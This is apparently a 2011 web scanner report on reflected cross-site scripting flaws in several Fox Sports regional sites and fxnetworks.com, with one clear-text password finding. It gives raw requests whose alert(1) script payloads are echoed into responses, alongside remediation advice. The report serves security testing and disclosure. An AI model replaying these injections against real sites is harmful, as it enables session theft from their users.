Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload a7b37<script>alert(1)</script>d888ae8c722 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.htmla7b37<script>alert(1)</script>d888ae8c722 HTTP/1.1 Host: www.foxsportsarizona.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Wed, 12 Jan 2011 16:23:07 GMT Server: Apache Vary: Accept-Encoding Content-Length: 828 Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.htmla7b37<script>alert(1)</script>d888ae8c722"</strong> ...[SNIP]...
The value of the blockID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55364"><script>alert(1)</script>79c7f90bbd2 was submitted in the blockID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.html?blockID=38886355364"><script>alert(1)</script>79c7f90bbd2&feedID=3698 HTTP/1.1 Host: www.foxsportsarizona.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:30:45 GMT Server: Apache Set-Cookie: PHPSESSID=40f9bca318410e4cfa672214d5bf8092; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 51366
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
...[SNIP]... <input type=hidden name="blockID" id = "blockID" value="38886355364"><script>alert(1)</script>79c7f90bbd2"> ...[SNIP]...
The value of the feedID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6d4b"><script>alert(1)</script>16f19e0098 was submitted in the feedID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.html?blockID=388863&feedID=3698a6d4b"><script>alert(1)</script>16f19e0098 HTTP/1.1 Host: www.foxsportsarizona.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:23:17 GMT Server: Apache Set-Cookie: PHPSESSID=1a84fdcc161135e64e3d2221b0db6619; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 58352
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 93070<script>alert(1)</script>91afcaccc75 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /01/11/11/Hoke-who/landing.html93070<script>alert(1)</script>91afcaccc75 HTTP/1.1 Host: www.foxsportsdetroit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Wed, 12 Jan 2011 16:23:17 GMT Server: Apache Vary: Accept-Encoding Content-Length: 796 Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/01/11/11/Hoke-who/landing.html93070<script>alert(1)</script>91afcaccc75"</strong> ...[SNIP]...
The value of the blockID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de0e9"><script>alert(1)</script>e3afe52d09e was submitted in the blockID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /01/11/11/Hoke-who/landing.html?blockID=389355de0e9"><script>alert(1)</script>e3afe52d09e&feedID=3701 HTTP/1.1 Host: www.foxsportsdetroit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:26:50 GMT Server: Apache Set-Cookie: PHPSESSID=eec4bb8bfce9df6b5b3bbf693b14a6e4; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 51025
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
...[SNIP]... <input type=hidden name="blockID" id = "blockID" value="389355de0e9"><script>alert(1)</script>e3afe52d09e"> ...[SNIP]...
The value of the feedID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba3b4"><script>alert(1)</script>d08cfb044a1 was submitted in the feedID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /01/11/11/Hoke-who/landing.html?blockID=389355&feedID=3701ba3b4"><script>alert(1)</script>d08cfb044a1 HTTP/1.1 Host: www.foxsportsdetroit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:31:11 GMT Server: Apache Set-Cookie: PHPSESSID=676319e0c3f61ef6b5113deb86066f1c; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 29915
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 2e935<script>alert(1)</script>eec6c3d0b68 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html2e935<script>alert(1)</script>eec6c3d0b68 HTTP/1.1 Host: www.foxsportsdetroit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Wed, 12 Jan 2011 16:23:20 GMT Server: Apache Vary: Accept-Encoding Content-Length: 825 Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html2e935<script>alert(1)</script>eec6c3d0b68"</strong> ...[SNIP]...
The value of the blockID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93b0c"><script>alert(1)</script>862f06f3aed was submitted in the blockID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html?blockID=38932693b0c"><script>alert(1)</script>862f06f3aed&feedID=3701 HTTP/1.1 Host: www.foxsportsdetroit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:30:59 GMT Server: Apache Set-Cookie: PHPSESSID=3a8ee3bfa0fb01d31244e8ec79d23d1b; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 51170
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
...[SNIP]... <input type=hidden name="blockID" id = "blockID" value="38932693b0c"><script>alert(1)</script>862f06f3aed"> ...[SNIP]...
The value of the feedID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d02d"><script>alert(1)</script>6023c1192d was submitted in the feedID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html?blockID=389326&feedID=37018d02d"><script>alert(1)</script>6023c1192d HTTP/1.1 Host: www.foxsportsdetroit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:31:20 GMT Server: Apache Set-Cookie: PHPSESSID=8d89156ef6b1e184b11759f61891d912; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 25764
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 9d8ad<script>alert(1)</script>7c51d6d03e9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html9d8ad<script>alert(1)</script>7c51d6d03e9 HTTP/1.1 Host: www.foxsportsflorida.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Wed, 12 Jan 2011 16:31:03 GMT Server: Apache Vary: Accept-Encoding Content-Length: 835 Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html9d8ad<script>alert(1)</script>7c51d6d03e9"</strong> ...[SNIP]...
The value of the blockID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8698"><script>alert(1)</script>d6ee4877b45 was submitted in the blockID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html?blockID=388962f8698"><script>alert(1)</script>d6ee4877b45&feedID=7926 HTTP/1.1 Host: www.foxsportsflorida.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:27:02 GMT Server: Apache Set-Cookie: PHPSESSID=8c572c5883268691ec62a825d06dd0da; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 47946
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
...[SNIP]... <input type=hidden name="blockID" id = "blockID" value="388962f8698"><script>alert(1)</script>d6ee4877b45"> ...[SNIP]...
The value of the feedID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb111"><script>alert(1)</script>79685f9483c was submitted in the feedID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html?blockID=388962&feedID=7926eb111"><script>alert(1)</script>79685f9483c HTTP/1.1 Host: www.foxsportsflorida.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:31:21 GMT Server: Apache Set-Cookie: PHPSESSID=ee1c5d5b31dd79682bb6121b710599cc; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 36214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 4df24<script>alert(1)</script>c4267285f34 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html4df24<script>alert(1)</script>c4267285f34 HTTP/1.1 Host: www.foxsportssouth.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Wed, 12 Jan 2011 16:31:33 GMT Server: Apache Vary: Accept-Encoding Content-Length: 816 Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html4df24<script>alert(1)</script>c4267285f34"</strong> ...[SNIP]...
The value of the blockID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9667"><script>alert(1)</script>c95f720fdd was submitted in the blockID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html?blockID=389214e9667"><script>alert(1)</script>c95f720fdd&feedID=4354 HTTP/1.1 Host: www.foxsportssouth.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:27:17 GMT Server: Apache Set-Cookie: PHPSESSID=5907f57557bbb9fcefd7c02da713dd7b; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 71366
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html xmlns="http ...[SNIP]... <input type=hidden name="blockID" id = "blockID" value="389214e9667"><script>alert(1)</script>c95f720fdd"> ...[SNIP]...
The value of the feedID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5ac4"><script>alert(1)</script>791b659fd83 was submitted in the feedID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html?blockID=389214&feedID=4354e5ac4"><script>alert(1)</script>791b659fd83 HTTP/1.1 Host: www.foxsportssouth.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:31:42 GMT Server: Apache Set-Cookie: PHPSESSID=c40f723c592548a3e9a1ed20e7c0b840; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 30049
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html xmlns="http ...[SNIP]... <a href="javascript:void(0);popup('/pages/email_landing?share_url=/01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html?blockID=389214^feedID=4354e5ac4"><script>alert(1)</script>791b659fd83^',300,500);" rel="nofollow"> ...[SNIP]...
The value of the blockID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 423c9"><script>alert(1)</script>d94649dd93c was submitted in the blockID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /01/12/11/Cavs-roster-full-of-no-names-with-no-gam/landing_witz.html?blockID=389566423c9"><script>alert(1)</script>d94649dd93c&feedID=3709 HTTP/1.1 Host: www.foxsportswest.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:31:24 GMT Server: Apache Set-Cookie: PHPSESSID=7eac46d2426903c53eabd6c1efede00f; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 58990
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
...[SNIP]... <input type=hidden name="blockID" id = "blockID" value="389566423c9"><script>alert(1)</script>d94649dd93c"> ...[SNIP]...
The value of the feedID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 328cf"><script>alert(1)</script>d6eb460b7b8 was submitted in the feedID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /01/12/11/Cavs-roster-full-of-no-names-with-no-gam/landing_witz.html?blockID=389566&feedID=3709328cf"><script>alert(1)</script>d6eb460b7b8 HTTP/1.1 Host: www.foxsportswest.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:24:08 GMT Server: Apache Set-Cookie: PHPSESSID=61d15e7f6619b6b351041671f648e7ab; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 37507
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
1.18. http://www.fxnetworks.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.fxnetworks.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e4c3"><a>d8f9b2ad6a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /?3e4c3"><a>d8f9b2ad6a9=1 HTTP/1.1 Host: www.fxnetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html; charset=UTF-8 Expires: Wed, 12 Jan 2011 16:31:24 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 12 Jan 2011 16:31:24 GMT Connection: close Connection: Transfer-Encoding Content-Length: 55782
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.19. http://www.fxnetworks.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fxnetworks.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb2bc"-alert(1)-"d7b03092302 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?cb2bc"-alert(1)-"d7b03092302=1 HTTP/1.1 Host: www.fxnetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html; charset=UTF-8 Expires: Wed, 12 Jan 2011 16:31:28 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 12 Jan 2011 16:31:28 GMT Connection: close Connection: Transfer-Encoding Content-Length: 55803
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.20. http://www.fxnetworks.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fxnetworks.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload ad7b6--><script>alert(1)</script>e673a2825ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /?ad7b6--><script>alert(1)</script>e673a2825ae=1 HTTP/1.1 Host: www.fxnetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html; charset=UTF-8 Expires: Wed, 12 Jan 2011 16:31:29 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 12 Jan 2011 16:31:29 GMT Connection: close Connection: Transfer-Encoding Content-Length: 55775
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.foxsportsarizona.com/
The form contains the following password field:
login_password
Request
GET / HTTP/1.1 Host: www.foxsportsarizona.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:30:38 GMT Server: Apache Set-Cookie: PHPSESSID=af9575f12421c13e00e39bf3dd199ca5; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 84050
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
GET /01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.html HTTP/1.1 Host: www.foxsportsarizona.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:30:38 GMT Server: Apache Set-Cookie: PHPSESSID=dce594637b946858ac8562e11cd29bfc; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 51085
